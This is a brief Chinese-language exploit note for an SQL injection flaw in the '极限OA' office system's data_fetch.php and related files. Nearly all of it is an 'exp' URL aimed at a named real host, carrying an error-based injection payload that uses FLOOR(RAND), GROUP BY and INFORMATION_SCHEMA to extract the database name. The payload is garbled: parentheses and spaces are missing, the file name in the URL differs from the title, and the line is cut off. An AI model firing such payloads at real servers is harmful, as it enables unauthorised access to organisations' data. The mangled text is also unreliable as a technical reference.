极限OA系统 data_fetch.php check_secure_key.php 等文件SQL注入漏洞

exp: http://oa.jsmstc.com/general/workflow/list/inputform/datafetch.php?runid=1 AND SELECT 1 FROMSELECT COUNT,CONCAT0x7e7e7e,MIDIFNULLCASTdatabase AS CHAR,0x20,1,50,0x7e7e7e,FLOORRAND02x FROM INFORMATIONSCHEMA.CHARACTERSETS GROUP BY xa...